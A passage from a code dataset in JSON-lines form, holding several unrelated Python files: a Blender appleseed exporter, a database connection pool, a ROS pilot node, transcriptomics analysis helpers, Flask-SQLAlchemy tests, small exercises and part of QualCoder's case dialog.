x[1])\n","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"213797344","text":"#\n# This source file is part of appleseed.\n# Visit https://appleseedhq.net/ for additional information and resources.\n#\n# This software is released under the MIT license.\n#\n# Copyright (c) 2014-2018 The appleseedhq Organization\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\nimport bpy\nfrom bpy.props import BoolProperty, StringProperty\nfrom bpy_extras.io_utils import ExportHelper\n\nfrom .utils import util\nfrom .translators import SceneTranslator\n\n\nclass ExportAppleseedScene(bpy.types.Operator, ExportHelper):\n \"\"\"\n Export the scene to an appleseed project on disk.\n \"\"\"\n\n bl_idname = \"appleseed.export_scene\"\n bl_label = \"Export appleseed Scene\"\n bl_options = {'PRESET'}\n\n filename_ext = \".appleseed\"\n filter_glob = StringProperty(default=\"*.appleseed\", options={'HIDDEN'})\n\n # Properties.\n\n animation = BoolProperty(name=\"Animation\", description=\"Write out an appleseed project for each frame\", default=False)\n\n # selected_only = BoolProperty(name=\"Selection Only\", description=\"Export selected objects only\", default=False)\n # packed = BoolProperty(name=\"Pack Project\", description=\"Export packed projects\", default=False)\n\n @classmethod\n def poll(cls, context):\n renderer = context.scene.render\n return renderer.engine == 'APPLESEED_RENDER'\n\n def execute(self, context):\n export_path = util.realpath(self.filepath)\n\n scene = context.scene\n\n if self.animation:\n\n if not '#' in export_path:\n self.report(\n {'ERROR'},\n 'Exporting animation but project filename has no # frame placeholders.')\n return {'CANCELLED'}\n\n replacements = [\n ('######', \"%06d\"),\n ('#####', \"%05d\"),\n ('####', \"%04d\"),\n ('###', \"%03d\"),\n ('##', \"%02d\"),\n ('#', \"%d\")\n ]\n\n for i in replacements:\n if i[0] in export_path:\n export_path = export_path.replace(i[0], i[1])\n break\n\n frame_start = scene.frame_start\n frame_end = scene.frame_end\n\n for frame in range(frame_start, frame_end + 1):\n scene.frame_set(frame)\n proj_filename = export_path % frame\n self.__export_project(context, proj_filename)\n\n else:\n self.__export_project(context, export_path)\n\n return {'FINISHED'}\n\n def __export_project(self, context, export_path):\n scene_translator = SceneTranslator.create_project_export_translator(context.scene, export_path)\n scene_translator.translate_scene()\n scene_translator.write_project(export_path)\n\n\ndef menu_func_export_scene(self, context):\n self.layout.operator(ExportAppleseedScene.bl_idname, text=\"appleseed (.appleseed)\")\n\n\ndef register():\n util.safe_register_class(ExportAppleseedScene)\n bpy.types.INFO_MT_file_export.append(menu_func_export_scene)\n\n\ndef unregister():\n bpy.types.INFO_MT_file_export.remove(menu_func_export_scene)\n util.safe_unregister_class(ExportAppleseedScene)\n","sub_path":"export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"342659359","text":"import unittest\nimport sys\n\nundertest = __import__(sys.argv[-1].split(\".py\")[0])\najeita_lista = getattr(undertest, 'ajeita_lista', None)\n\nclass PublicTests(unittest.TestCase):\n\n def test_do_enunciado(self):\n lista1 = [3,2,1,4,5,6,7,8,9]\n assert ajeita_lista(lista1) == None\n assert lista1 == [8, 6, 4, 2, 1, 3, 5, 7, 9]\n\nif __name__ == '__main__':\n loader = unittest.TestLoader()\n runner = unittest.TextTestRunner()\n runner.run(loader.loadTestsFromModule(sys.modules[__name__]))\n","sub_path":"Unidade7/ajeita_lista/public_tests.py","file_name":"public_tests.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139696662","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n#\n# Author : wh\n# E-mail : wh_linux@126.com\n# Date : 14/07/09 14:26:38\n# Desc :\n#\nfrom __future__ import absolute_import\n\nimport logging\n\nfrom fbook.util import torndb\n\n_conn = None\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass _Connector(object):\n \"\"\" 代理数据库连接的调用\n \"\"\"\n def __init__(self, conn, pool):\n self._conn = conn\n self._pool = pool\n self._closed = False\n\n def __getattr__(self, name):\n if self._closed:\n raise Exception(\"Connection has closed\")\n\n if self._conn:\n return getattr(self._conn, name)\n\n def close(self):\n \"\"\" 关闭连接, 如果真关闭则返回 True, 如果仅仅是放回池中则返回 False\n \"\"\"\n self._closed = True\n #XXX 清理的时候 logger 可能会被先清理\n if logger is not None:\n logger.debug(\"Close the connection...\")\n\n if self._conn not in self._pool._connections:\n if logger is not None:\n logger.debug(\"Connection is not in the pool close it: %s\",\n self._conn)\n self._conn.close()\n return True\n else:\n if logger is not None:\n logger.debug(\"Connection is in the pool put it in idle\"\n \" connections: %s\", self._conn)\n self._pool._idle_connections.append(self._conn)\n return False\n\n def __del__(self):\n if not self._closed:\n self.close()\n\n\nclass ConnectionPool(object):\n \"\"\" 数据库连接池, 如果没有超过连接数则创建连接, 并在使用完毕后将此连接放入池中,\n 如果超过则创建一个临时连接, 在使用完毕后会关闭连接\n \"\"\"\n\n def __init__(self, max_num=10, *args, **kwargs):\n self.max_num = max_num\n\n self._connections = []\n self._idle_connections = []\n self._closed = False\n self._args, self._kwargs = args, kwargs\n\n def _create(self):\n return torndb.Connection(*self._args, **self._kwargs)\n\n def _ping(self, conn, reconnect=True):\n try:\n alive = conn._db.ping()\n except Exception:\n logger.warn(\"ping database error\", exc_info=True)\n alive = False\n\n if alive is None:\n alive = True\n\n if not alive and reconnect:\n try:\n _conn = self._create()\n except Exception:\n logger.warn(\"create database connect error\", exc_info=True)\n return None\n else:\n if conn in self._connections:\n self._connections.remove(conn)\n self._connections.append(_conn)\n conn = _conn\n return conn\n\n def connection(self):\n if self._idle_connections:\n conn = self._idle_connections.pop(0)\n conn = self._ping(conn)\n if conn is None:\n raise\n logger.debug(\"Got connection from idle connections:%s\", conn)\n else:\n conn = self._create()\n logger.debug(\"Create a new connection: %s\", conn)\n if len(self._connections) < self.max_num:\n logger.debug(\"Pool is not full %s/%s, put it in the pool\",\n len(self._connections), self.max_num)\n self._connections.append(conn)\n else:\n logger.debug(\"Pool was full %s/%s, make it temporary\",\n self.max_num, self.max_num)\n return _Connector(conn, self)\n\n def close(self):\n \"\"\" 关闭空闲连接, 清空连接池\n \"\"\"\n self._closed = True\n\n if logger is not None:\n logger.debug(\"Close the pool...\")\n\n for connect in self._idle_connections:\n\n if logger is not None:\n logger.debug(\"Close the idle connections: %s\", connect)\n\n connect.close()\n\n self._idle_connections = []\n self._connections = []\n\n def __del__(self):\n if not self._closed:\n self.close()\n","sub_path":"fbook/data/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"447348879","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport math\n\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\n\nfrom b2_logic.nodes.pilot import PilotNode, PVelocityController\nfrom b2.msg import Proximity\n\n\nDEFAULT_NODE_NAME = \"pilot_node\"\n\n# Subscribes\nDEFAULT_PROXIMITY_TOPIC = \"ir_sensors/proximity\"\nDEFAULT_ODOMETRY_TOPIC = \"base_node/odom\"\n\n# Publishes\nDEFAULT_CMD_TOPIC = \"base_node/cmd_vel\"\n\nDEFAULT_LOOP_HZ = 5 # hertz\nDEFAULT_MAX_FWD_SPEED = 0.5 # m/sec\nDEFAULT_MIN_FWD_SPEED = 0.1 # m/sec\nDEFAULT_MAX_TURN_SPEED = math.pi / 4 # radians/sec\nDEFAULT_MIN_TURN_SPEED = 0.1 # radians/sec\nDEFAULT_TURN_DEGREES = 90 # degrees, will be converted to radians\nDEFAULT_TURN_DEGREE_TOLERANCE = 5 # degrees, will be converted to radians\nDEFAULT_LINEAR_K = 1\nDEFAULT_ANGULAR_K = 1 # K constant for angular P controller\n\n\nif __name__ == \"__main__\":\n rospy.init_node(DEFAULT_NODE_NAME, log_level=rospy.DEBUG)\n\n node_name = rospy.get_name()\n loophz = rospy.get_param(\"~loop_hz\", DEFAULT_LOOP_HZ)\n max_fwd_speed = rospy.get_param(\"~max_fwd_speed\", DEFAULT_MAX_FWD_SPEED)\n min_fwd_speed = rospy.get_param(\"~min_fwd_speed\", DEFAULT_MIN_FWD_SPEED)\n max_turn_speed = rospy.get_param(\"~max_turn_speed\", DEFAULT_MAX_TURN_SPEED)\n min_turn_speed = rospy.get_param(\"~min_turn_speed\", DEFAULT_MIN_TURN_SPEED)\n turn_radians = math.radians(rospy.get_param(\"~turn_degrees\", DEFAULT_TURN_DEGREES))\n turn_radians_tolerance = math.radians(\n rospy.get_param(\"~turn_degree_tolerance\", DEFAULT_TURN_DEGREE_TOLERANCE))\n linear_k = rospy.get_param(\"~linear_k\", DEFAULT_LINEAR_K)\n angular_k = rospy.get_param(\"~angular_k\", DEFAULT_ANGULAR_K)\n\n # P-Controller\n pcontroller = PVelocityController(\n min_fwd_speed, max_fwd_speed,\n min_turn_speed, max_turn_speed,\n linear_k=linear_k, angular_k=angular_k\n )\n\n # Publishes\n cmd_vel_pub = rospy.Publisher(\n rospy.get_param('~cmd_topic', DEFAULT_CMD_TOPIC),\n Twist,\n queue_size=1\n )\n\n node = PilotNode(loophz, turn_radians, turn_radians_tolerance, cmd_vel_pub, pcontroller)\n\n # Subscribes\n rospy.Subscriber(\n rospy.get_param(\"~proximity_topic\", DEFAULT_PROXIMITY_TOPIC),\n Proximity,\n node.prox_callback\n )\n\n # Subscribes\n rospy.Subscriber(\n rospy.get_param(\"~odom_topic\", DEFAULT_ODOMETRY_TOPIC),\n Odometry,\n node.odom_callback\n )\n\n node.run()\n","sub_path":"nodes/pilot_node.py","file_name":"pilot_node.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"96135332","text":"# Copyright (c) Sunlight Labs, 2012 under the terms and conditions\n# of the LICENSE file.\n\n\"\"\"\n.. module:: sunlight.service\n :synopsis: Sunlight API Superclass\n\nBase service class. All API classes (such as say -\n:class:`sunlight.services.openstates.OpenStates`) inherit from this.\n\"\"\"\nimport sys\n\nimport sunlight.config\nimport sunlight.errors\n\nif sys.version_info[0] >= 3:\n from urllib.parse import urlencode\n from urllib.request import urlopen\n from urllib.error import HTTPError\n _str_type = str\nelse:\n from urllib import urlencode\n from urllib2 import urlopen\n from urllib2 import HTTPError\n _str_type = basestring\n\n\ndef safe_encode(kwargs):\n kwargs = kwargs.copy()\n for k, v in kwargs.iteritems():\n if isinstance(v, _str_type):\n kwargs[k] = v.encode('utf8')\n return urlencode(kwargs)\n\n\nclass Service:\n \"\"\"\n Base class for all the API implementations, as well as a bunch of common\n code on how to actually fetch text over the network.\n \"\"\"\n\n def get(self, top_level_object, **kwargs):\n \"\"\"\n Get some data from the network - this is where we actually fetch\n something and make a request.\n\n .. warning:: Be sure that API_KEY was set before calling this method.\n This will throw a :class:`sunlight.errors.NoAPIKeyException` if\n the API_KEY is not set.\n\n args:\n ``top_level_object`` (str): Thing to query for (such as say,\n \"bills\" for OpenStates )\n\n kwargs:\n These arguments will be passed to the underlying API implementation\n to help create a query. Validation will happen down below, and\n on a per-API level.\n \"\"\"\n if not sunlight.config.API_KEY:\n raise sunlight.errors.NoAPIKeyException(\n \"Warning: Missing API Key. please visit \" +\n sunlight.config.API_SIGNUP_PAGE +\n \" to register for a key.\"\n )\n\n url = self._get_url(top_level_object, sunlight.config.API_KEY,\n **kwargs)\n try:\n r = urlopen(url)\n return_data = r.read().decode('utf8')\n return self._decode_response(return_data)\n except HTTPError as e:\n message = e.read()\n code = e.getcode()\n\n ex = sunlight.errors.BadRequestException(\"Error (%s) -- %s\" % (\n code, message\n ))\n\n ex.url = e.geturl()\n ex.message = message\n ex.code = code\n\n raise ex\n","sub_path":"data_analysis/Mar2013/build/sunlight/build/lib.linux-x86_64-2.7/sunlight/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"92023377","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom os import listdir\nimport numpy as np\n\ndef dataframe_diff_expression(time='T2', strain_base='WT'):\n \"\"\"\n Returns a dataframe with differential expression with respect to strain_base.\n \"\"\"\n df_out = None\n if time == 'T1':\n scen=['WT_T1', 'pkt_T1', 'goret_T1', 'Saccha_T1', 'gap_T1']\n elif time == 'T2':\n scen=['WT_T2', 'pkt_T2', 'goret_T2', 'Saccha_T2', 'gap_T2']\n \n scen.remove(strain_base+'_'+time)\n wd_data = '/Users/aalarcon/Documents/Data/IBN-Transcriptomique-7/HELIXIO/Isoforms-diff/'\n data_files = listdir(wd_data)\n \n for s in scen:\n name1 = 'Isoforms_Diff_Samples_' + s + '_vs_' + strain_base + '_' + time + '.xlsx'\n name2 = 'Isoforms_Diff_Samples_' + strain_base + '_' + time + '_vs_' + s + '.xlsx'\n if data_files.count(name1) == 1:\n tr_data = pd.read_excel(wd_data + name1, index_col=1)\n \n elif data_files.count(name2) == 1:\n tr_data = pd.read_excel(wd_data + name2, index_col=1)\n else:\n tr_data = None\n print('Error !!!!!!!!!!!!! no file found for', s2, ' vs ', s1)\n \n tr_data.columns = [c.replace(' ','').replace('[','').replace(']','').replace('FPKM','') \n for c in tr_data.columns]\n \n if df_out is None:\n df_out = pd.DataFrame(index=tr_data.index)\n df_out['Gene_name'] = tr_data['Gene_name']\n \n df_out[s] = 0\n\n for idx in tr_data.index:\n if tr_data.q_value.loc[idx] <= 0.05:\n if tr_data[s].loc[idx] > tr_data[strain_base+'_'+time].loc[idx]:\n df_out.set_value(idx, s, 1)\n elif tr_data[s].loc[idx] < tr_data[strain_base+'_'+time].loc[idx]:\n df_out.set_value(idx, s, -1)\n return df_out\n \n \n\ndef comp_genes_transcripto(loci, time='T2', plot=False, title_plot=None):\n \"\"\"\n Compare transcriptomics of different genes given their locus.\n if arg plot=False, returns a dataframe, else returns nothing and plots the dataframe\n as a heatmap. Title of plot can be modified with title_plot argument.\n \"\"\"\n if time == 'T1':\n scen=['WT_T1', 'pkt_T1', 'goret_T1', 'Saccha_T1', 'gap_T1']\n elif time == 'T2':\n scen=['WT_T2', 'pkt_T2', 'goret_T2', 'Saccha_T2', 'gap_T2']\n df_comp = pd.DataFrame(index=['time']+scen[:-2], columns=scen, data=np.nan)\n wd_data = '/Users/aalarcon/Documents/Data/IBN-Transcriptomique-7/HELIXIO/Isoforms-diff/'\n data_files = listdir(wd_data)\n for s1 in scen:\n for s2 in scen[scen.index(s1)+1:]:\n name1 = 'Isoforms_Diff_Samples_' + s2 + '_vs_' + s1 + '.xlsx'\n name2 = 'Isoforms_Diff_Samples_' + s1 + '_vs_' + s2 + '.xlsx'\n if data_files.count(name1) == 1:\n tr_data = pd.read_excel(wd_data + name1, index_col=1)\n elif data_files.count(name2) == 1:\n tr_data = pd.read_excel(wd_data + name2, index_col=1)\n else:\n tr_data = None\n print('Error !!!!!!!!!!!!! no file found for', s2, 'vs', s1)\n tr_data.columns = [c.replace(' ','').replace('[','').replace(']','').replace('FPKM','') \n for c in tr_data.columns]\n count = 0\n for locus in loci:\n if tr_data.q_value.loc[locus] <= 0.05:\n if tr_data[s2].loc[locus] > tr_data[s1].loc[locus]:\n count += 1\n elif tr_data[s2].loc[locus] < tr_data[s1].loc[locus]:\n count -= 1\n df_comp.set_value(s1, s2, count/len(loci))\n\n for s2 in scen:\n if s2.split('_')[1] == 'T1':\n s1 = s2.split('_')[0] + '_T2'\n else:\n s1 = s2.split('_')[0] + '_T1'\n name1 = 'Isoforms_Diff_Samples_' + s2 + '_vs_' + s1 + '.xlsx'\n name2 = 'Isoforms_Diff_Samples_' + s1 + '_vs_' + s2 + '.xlsx'\n if data_files.count(name1) == 1:\n tr_data = pd.read_excel(wd_data + name1, index_col=1)\n elif data_files.count(name2) == 1:\n tr_data = pd.read_excel(wd_data + name2, index_col=1)\n else:\n tr_data = None\n print('Error !!!!!!!!!!!!! no file found for', s2, 'vs', s1)\n tr_data.columns = [c.replace(' ','').replace('[','').replace(']','') for c in tr_data.columns]\n count = 0.0\n for locus in loci:\n if tr_data.q_value.loc[locus] <= 0.05:\n if tr_data[s2].loc[locus] > tr_data[s1].loc[locus]:\n count += 1\n elif tr_data[s2].loc[locus] < tr_data[s1].loc[locus]:\n count -= 1\n df_comp.set_value('time', s2, count/len(loci))\n if plot:\n fig = plt.figure(figsize=(5,5))\n sns.heatmap(df_comp, cmap='coolwarm', annot=True, linewidth=2, cbar=False, center=0)\n if title_plot is None:\n plt.title('Comparison Transcriptomics')\n else:\n plt.title(title_plot)\n return fig\n else:\n return df_comp","sub_path":"ipynb/funcs_transcripto.py","file_name":"funcs_transcripto.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"396382564","text":"from csv import writer,DictWriter\n\nwith open(\"5_file0.csv\", 'w', newline = \"\") as f:\n # csv_writer = writer(f)\n # print(csv_writer)\n # csv_writer.writerow(['Name','age'])\n # csv_writer.writerow([\"Bhaumik\",24])\n\n # csv_writer.writerows([['Hemil',21], ['Arth',16]])\n\n csv_file = DictWriter(f, fieldnames = [\"name\", \"age\"])\n\n csv_file.writeheader()\n csv_file.writerow({\"name\": \"Bhaumik\", \"age\": 24})\n\n csv_file.writerows([\n {'name': 'Hemil', 'age': 21},\n {'name': 'Arth', 'age': 16}\n ])\n","sub_path":"Python/begining programs/folder2/5_csv_writer.py","file_name":"5_csv_writer.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"388099966","text":"import sys\n\nfor line in (l.strip() for l in open(sys.argv[1])):\n if line:\n x, n = (int(x) for x in line.split(','))\n\n multiplier = 1\n while n * multiplier < x:\n multiplier += 1\n\n print(n * multiplier)\n","sub_path":"easy/18_multiples_of_a_number.py","file_name":"18_multiples_of_a_number.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"175205107","text":"import random\n\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import sessionmaker\n\nfrom flask_sqlalchemy import SQLAlchemy\n\n\ndef test_default_session_scoping(app, db):\n class FOOBar(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n\n db.create_all()\n\n with app.test_request_context():\n fb = FOOBar()\n db.session.add(fb)\n assert fb in db.session\n\n\ndef test_session_scoping_changing(app):\n db = SQLAlchemy(app, session_options={\"scopefunc\": random.random})\n\n class Example(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n\n db.create_all()\n fb = Example()\n db.session.add(fb)\n assert fb not in db.session # because a new scope is generated on each call\n\n\ndef test_insert_update_delete(db):\n # Ensure _SignalTrackingMapperExtension doesn't croak when\n # faced with a vanilla SQLAlchemy session. Verify that\n # \"AttributeError: 'SessionMaker' object has no attribute\n # '_model_changes'\" is not thrown.\n Session = sessionmaker(bind=db.engine)\n\n class QazWsx(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n x = db.Column(db.String, default=\"\")\n\n db.create_all()\n session = Session()\n session.add(QazWsx())\n session.flush() # issues an INSERT.\n session.expunge_all()\n qaz_wsx = session.query(QazWsx).first()\n assert qaz_wsx.x == \"\"\n qaz_wsx.x = \"test\"\n session.flush() # issues an UPDATE.\n session.expunge_all()\n qaz_wsx = session.query(QazWsx).first()\n assert qaz_wsx.x == \"test\"\n session.delete(qaz_wsx) # issues a DELETE.\n assert session.query(QazWsx).first() is None\n\n\ndef test_listen_to_session_event(db):\n sa.event.listen(db.session, \"after_commit\", lambda session: None)\n","sub_path":"tests/test_sessions.py","file_name":"test_sessions.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"78785641","text":"# -*- coding: utf-8 -*-\n\n'''\nCopyright (c) 2019 Colin Curtain\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\nAuthor: Colin Curtain (ccbogel)\nhttps://github.com/ccbogel/QualCoder\n'''\n\nimport csv\nimport datetime\nimport logging\nimport os\nimport sys\nimport re\nimport traceback\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import Qt\n\nfrom add_item_name import DialogAddItemName\nfrom confirm_delete import DialogConfirmDelete\nfrom GUI.ui_dialog_cases import Ui_Dialog_cases\nfrom GUI.ui_dialog_attribute_type import Ui_Dialog_attribute_type\nfrom GUI.ui_dialog_start_and_end_marks import Ui_Dialog_StartAndEndMarks\nfrom memo import DialogMemo\nfrom select_file import DialogSelectFile\nfrom view_av import DialogViewAV\nfrom view_image import DialogViewImage\n\n\npath = os.path.abspath(os.path.dirname(__file__))\nlogger = logging.getLogger(__name__)\n\n\ndef exception_handler(exception_type, value, tb_obj):\n \"\"\" Global exception handler useful in GUIs.\n tb_obj: exception.__traceback__ \"\"\"\n tb = '\\n'.join(traceback.format_tb(tb_obj))\n text = 'Traceback (most recent call last):\\n' + tb + '\\n' + exception_type.__name__ + ': ' + str(value)\n print(text)\n logger.error(_(\"Uncaught exception: \") + text)\n QtWidgets.QMessageBox.critical(None, _('Uncaught Exception'), text)\n\n\nclass DialogCases(QtWidgets.QDialog):\n ''' Create, edit and delete cases.\n Assign entire text files or portions of files to cases.\n Assign attributes to cases. '''\n\n NAME_COLUMN = 0 # also primary key\n MEMO_COLUMN = 1\n ID_COLUMN = 2\n app = None\n parent_textEdit = None\n source = []\n sourceText = \"\"\n cases = []\n case_text = []\n selected_case = None\n selected_file = None\n caseTextViewed = []\n attributes = []\n\n def __init__(self, app, parent_textEdit):\n\n sys.excepthook = exception_handler\n self.app = app\n self.parent_textEdit = parent_textEdit\n QtWidgets.QDialog.__init__(self)\n self.ui = Ui_Dialog_cases()\n self.ui.setupUi(self)\n font = 'font: ' + str(self.app.settings['fontsize']) + 'pt '\n font += '\"' + self.app.settings['font'] + '\";'\n self.setStyleSheet(font)\n self.load_cases_and_attributes()\n self.ui.pushButton_add.clicked.connect(self.add_case)\n self.ui.pushButton_delete.clicked.connect(self.delete_case)\n self.ui.tableWidget.itemChanged.connect(self.cell_modified)\n self.ui.tableWidget.cellClicked.connect(self.cell_selected)\n self.ui.pushButton_addfiles.clicked.connect(self.add_file_to_case)\n self.ui.pushButton_openfile.clicked.connect(self.select_file)\n self.ui.pushButton_add_attribute.clicked.connect(self.add_attribute)\n self.ui.pushButton_autoassign.clicked.connect(self.automark)\n self.ui.pushButton_view.clicked.connect(self.view)\n self.ui.pushButton_import_cases.clicked.connect(self.import_cases_and_attributes)\n self.ui.textBrowser.setText(\"\")\n self.ui.textBrowser.setAutoFillBackground(True)\n self.ui.textBrowser.setContextMenuPolicy(Qt.CustomContextMenu)\n self.ui.textBrowser.customContextMenuRequested.connect(self.textBrowser_menu)\n self.ui.textBrowser.setOpenLinks(False)\n self.ui.textBrowser.anchorClicked.connect(self.link_clicked)\n self.fill_tableWidget()\n self.ui.splitter.setSizes([1, 1, 0])\n\n def load_cases_and_attributes(self):\n \"\"\" Load case and attribute details from database. Display in tableWidget.\n \"\"\"\n\n self.source = []\n self.cases = []\n self.case_text = []\n\n cur = self.app.conn.cursor()\n cur.execute(\"select name, id, fulltext, mediapath, memo, owner, date from source\")\n result = cur.fetchall()\n for row in result:\n self.source.append({'name': row[0], 'id': row[1], 'fulltext': row[2],\n 'mediapath': row[3], 'memo': row[4], 'owner': row[5], 'date': row[6]})\n cur.execute(\"select name, memo, owner, date, caseid from cases\")\n result = cur.fetchall()\n for row in result:\n self.cases.append({'name': row[0], 'memo': row[1], 'owner': row[2], 'date': row[3],\n 'caseid': row[4]})\n cur.execute(\"select name from attribute_type where caseOrFile='case'\")\n attribute_names = cur.fetchall()\n self.headerLabels = [\"Name\", \"Memo\", \"Id\"]\n for i in attribute_names:\n self.headerLabels.append(i[0])\n sql = \"select attribute.name, value, id from attribute where attr_type='case'\"\n cur.execute(sql)\n result = cur.fetchall()\n self.attributes = []\n for row in result:\n self.attributes.append(row)\n\n def add_attribute(self):\n \"\"\" When add button pressed, opens the addItem dialog to get new attribute text.\n Then get the attribute type through a dialog.\n AddItem dialog checks for duplicate attribute name.\n New attribute is added to the model and database. \"\"\"\n\n cur = self.app.conn.cursor()\n cur.execute(\"select name from attribute_type where caseOrFile='case'\")\n result = cur.fetchall()\n attribute_names = []\n for a in result:\n attribute_names.append({'name': a[0]})\n check_names = attribute_names + [{'name': 'name'}, {'name':'memo'}, {'name':'caseid'}, {'name':'date'}]\n ui = DialogAddItemName(check_names, _(\"New attribute name\"))\n ui.exec_()\n name = ui.get_new_name()\n if name is None or name == \"\":\n return\n Dialog_type = QtWidgets.QDialog()\n ui = Ui_Dialog_attribute_type()\n ui.setupUi(Dialog_type)\n ok = Dialog_type.exec_()\n valuetype = \"character\"\n if ok and ui.radioButton_numeric.isChecked():\n valuetype = \"numeric\"\n # update attribute_type list and database\n now_date = str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n cur.execute(\"insert into attribute_type (name,date,owner,memo,caseOrFile, valuetype) values(?,?,?,?,?,?)\"\n ,(name, now_date, self.app.settings['codername'], \"\", 'case', valuetype))\n self.app.conn.commit()\n sql = \"select caseid from cases\"\n cur.execute(sql)\n case_ids = cur.fetchall()\n for id_ in case_ids:\n sql = \"insert into attribute (name, value, id, attr_type, date, owner) values (?,?,?,?,?,?)\"\n cur.execute(sql, (name, \"\", id_[0], 'case', now_date, self.app.settings['codername']))\n self.app.conn.commit()\n self.load_cases_and_attributes()\n self.fill_tableWidget()\n self.parent_textEdit.append(_(\"Attribute added to cases: \") + name + \", \" + _(\"type: \") + valuetype)\n\n def textBrowser_menu(self, position):\n ''' Context menu for textBrowser. Mark, unmark, annotate, copy. '''\n\n menu = QtWidgets.QMenu()\n if self.ui.textBrowser.toPlainText() == \"\":\n return\n ActionItemMark = menu.addAction(_(\"Mark\"))\n ActionItemUnmark = menu.addAction(_(\"Unmark\"))\n ActionItemCopy = menu.addAction(\"Copy\")\n action = menu.exec_(self.ui.textBrowser.mapToGlobal(position))\n if action == ActionItemMark:\n self.mark()\n if action == ActionItemUnmark:\n self.unmark()\n if action == ActionItemCopy:\n self.copy_selected_text_to_clipboard()\n\n def copy_selected_text_to_clipboard(self):\n\n selectedText = self.ui.textBrowser.textCursor().selectedText()\n cb = QtWidgets.QApplication.clipboard()\n cb.clear(mode=cb.Clipboard)\n cb.setText(selectedText, mode=cb.Clipboard)\n\n def import_cases_and_attributes(self):\n \"\"\" Import from a csv file with the cases and any attributes.\n The csv file must have a header row which details the attribute names.\n The csv file must be comma delimited. The first column must have the case ids.\n The attribute types are calculated from the data.\n \"\"\"\n\n if self.cases != []:\n logger.warning(_(\"Cases have already been created.\"))\n filename = QtWidgets.QFileDialog.getOpenFileName(None, _('Select attributes file'),\n self.app.settings['directory'], \"(*.csv)\")[0]\n if filename == \"\":\n return\n if filename[-4:].lower() != \".csv\":\n msg = filename + \"\\n\" + _(\"is not a .csv file. File not imported\")\n QtWidgets.QMessageBox.warning(None, \"Warning\", msg)\n self.parent_textEdit.append(msg)\n return\n values = []\n with open(filename, 'r', newline='') as f:\n reader = csv.reader(f, delimiter=',', quoting=csv.QUOTE_MINIMAL)\n try:\n for row in reader:\n values.append(row)\n except csv.Error as e:\n logger.warning(('file %s, line %d: %s' % (filename, reader.line_num, e)))\n if len(values) <= 1:\n logger.info(_(\"Cannot import from csv, only one row in file\"))\n return\n now_date = 